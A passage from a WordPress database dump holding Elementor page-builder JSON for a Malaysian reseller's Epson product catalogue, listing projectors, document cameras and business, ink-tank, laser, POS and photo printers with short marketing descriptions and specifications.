]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7888,3470,'_elementor_version','2.5.14'),(7891,3471,'_wp_page_template','template-fullwidth.php'),(7892,3471,'_elementor_edit_mode','builder'),(7893,3471,'_elementor_template_type','post'),(7894,3471,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"35\",\"right\":\"35\",\"bottom\":\"35\",\"left\":\"35\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND 